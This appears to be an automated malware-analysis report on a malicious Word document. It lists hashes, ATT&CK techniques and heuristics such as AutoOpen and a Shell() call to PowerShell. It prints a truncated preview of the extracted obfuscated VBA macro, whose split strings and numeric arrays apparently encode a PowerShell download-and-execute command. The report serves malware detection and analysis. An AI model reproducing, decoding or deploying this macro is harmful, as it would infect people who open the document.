Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3140a977c52bf42d…

MALICIOUS

Office (OLE)

Size: 102.8 KB
Created: 2018-06-21 10:54:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 9280d0a2579c748daca314d1f2f9efb4
SHA-1: a50dd19b8366f8301450c649ad5a70b37171bea2
SHA-256: 3140a977c52bf42daf7279f676a13b210166275b131ab98d9d29c81cda23dcd6
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, which is a critical finding, and specifically calls 'powershell'. This indicates an attempt to download and execute a secondary payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.

Heuristics (6)

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  16309 bytes
SHA-256: e65e3ab6b679dc553d352cbb93f33bf2ace5183e45a990a2ec0195b8571cd63d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iBbzpLjzG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iOGGmiXdOThjD"
Function bEihGNi()
On Error Resume Next
For Each MTHpZS In LKzbCz
FQkcL = 43779 + Atn(89881) / 75995 / Round(56265) / 18858 / CInt(VimoSC)
kTNpDF = (lwCZo * 80378 + 59223 * CInt(PLztWP - CDbl(5332)) * 64602 * Oct(48123))
AAGjm = lcbsw = aUOSb
Next
YaYbBRBoLC = "Ow" + "erSHe" + "ll  &( " + "$vERBos" + "epRE" + "fErEnCE.ToS" + "TriNG()[1,3]+'" + "x'-JoI" + "N'')( -j" + "oIn"
For Each LEMjn In Nmsul
SNuLLH = 55227 + Atn(65223) / 25067 / Round(56541) / 22708 / CInt(wRYHj)
iEohcJ = (Yojlwo * 53892 + 2172 * CInt(JKhIR - CDbl(18498)) * 11813 * Oct(44156))
VcYOZ = ACziWj = JffiP
Next
cYPPGvu = " (( " + "26 , 81 , 115 ," + "127, 113 ,125,8" + "7, 30" + " , 3 , 30 ,"
For Each JPFlw In ziZJAB
TJzXA = 75808 + Atn(12725) / 19142 / Round(63655) / 96529 / CInt(KStHX)
mtiEva = (MHwwn * 47351 + 77113 * CInt(YPcCz - CDbl(33912)) * 39932 * Oct(99940))
hRFOj = ThLBYb = McjOB
Next
lEhIVZiYTn = " 80, " + "91 ,73 ,19,81" + " , 92" + " ,84, 91 " + ",93 , " + "74 ,30,7" + "6 , 9" + "5 , 80 , "
For Each UDfZdP In XPiDCz
BqjTh = 16056 + Atn(1520) / 82831 / Round(25211) / 1412 / CInt(YuoqT)
kQRjN = (tEaaXm * 67480 + 16985 * CInt(GhMpwM - CDbl(22465)) * 41579 * Oct(57058))
tVAlFC = hcSuA = unlPc
Next
jAoMm = "90, 81, 83 , 5 " + ", 26 , 83, 1" + "24 ,8" + "7,68 ,83 ,121, " + "30,3,30,80 " + ", 91 ,73"
bEihGNi = YaYbBRBoLC + cYPPGvu + lEhIVZiYTn + jAoMm
End Function
Function mPNjKEizT()
On Error Resume Next
For Each sSVXQ In GqvGU
RLWXmw = 92176 + Atn(89424) / 94627 / Round(84436) / 53395 / CInt(zchrN)
BNwjP = (zNCTdE * 22757 + 88610 * CInt(TtAMWa - CDbl(50091)) * 85735 * Oct(94103))
ikmZc = BjYLnM = iLqGLZ
Next
jhmWUI = " ,19 , 8" + "1, 92,84 , 91, " + "93" + ", 74, 30, 1"
For Each ZibXni In GEVAjU
UoGzat = 83856 + Atn(46649) / 60863 / Round(5207) / 4600 / CInt(ctwwal)
THpXO = (njpHj * 62947 + 68336 * CInt(NMzUd - CDbl(34859)) * 73627 * Oct(82476))
tYndf = auQXNB = mKdwAt
Next
dthCzVjOS = "09" + ", 71" + " , " + "77 , 74," + " 91 , 83, 16" + " ,1" + "12 " + ", 91,74,16 , "
For Each oOMSJ In RVamr
MwEols = 43715 + Atn(67793) / 52096 / Round(77850) / 34688 / CInt(oTljU)
RtztFR = (CmACOO * 40395 + 71459 * CInt(wqLCN - CDbl(87971)) * 9676 * Oct(58850))
VzdJY = loXli = AqjliU
Next
GdXVWDncKdQ = "105" + " , " + "91 , " + "92" + ", 125 " + ",82 ,87 , 91 ,8" + "0,74 ,5,26 ,8" + "4 ,125"
For Each tNjQa In jCuwzi
LAGalW = 14204 + Atn(66249) / 68836 / Round(84835) / 35217 / CInt(pRNWlE)
iYRSJ = (IrRBi * 20063 + 99836 * CInt(NuLOH - CDbl(23738)) * 50832 * Oct(79390))
EvXNE = wYjwXn = WAcRLT
Next
UtdTDGSElUB = ",10" + "0,82,119 ,127" + ",30 , 3 , " + "30,2" + "5, 86, 74 " + ",74,78 , " + "4, 17, 17, 74" + ", 70,84 , 89"
For Each JTdwN In SOYKlq
DoHjvU = 64719 + Atn(27919) / 62849 / Round(89777) / 57020 / CInt(wFNCwz)
GNvDp = (cibPor * 57938 + 63910 * CInt(hJirMH - CDbl(20039)) * 16401 * Oct(66411))
swTHj = wBRjb = JhocW
Next
NFcUwM = ",95, 73" + " ,92, 83 ," + " 16, 93 , 81, " + "83,17,108 ," + "82 ,9"
For Each assqp In zVLAw
BXBnR = 75723 + Atn(20615) / 97715 / Round(4936) / 86927 / CInt(ORqnt)
klcFu = (IDwZUq * 6396 + 46120 * CInt(nWIHk - CDbl(78355)) * 37327 * Oct(90477))
LzSXzw = OjrtH = zSHow
Next
BwFtmXA = "0 , 118, 11 , " + "89" + ",70 " + ", 17" + ",126," + "86 ,74,74 , 78 " + ",4,"
For Each ckFzDG In LiRTW
ATzjlj = 66172 + Atn(4993) / 1088 / Round(75114) / 32047 / CInt(TsCwv)
zvsItR = (KAkmz * 37853 + 40183 * CInt(dcQjG - CDbl(43469)) * 61324 * Oct(7071))
KzQubm = rbMtQ = IwVjm
Next
BAqkwfBfCrD = " 17, 17 ," + " 73,73 , 73," + " 1" + "6 ,7" + "7, 74 ," + " 81, 82, " + "88, 95"
For Each PiNOv In GbGHU
Fpdtq = 24782 + Atn(26127) / 1043 / Round(64554) / 76742 / CInt(TpCjq)
KWkED = (KOfKt * 69750 + 40977 * CInt(LtaYT - CDbl(18663)) * 2142 * Oct(39868))
DNmXb = Kdaijc = i
... (truncated)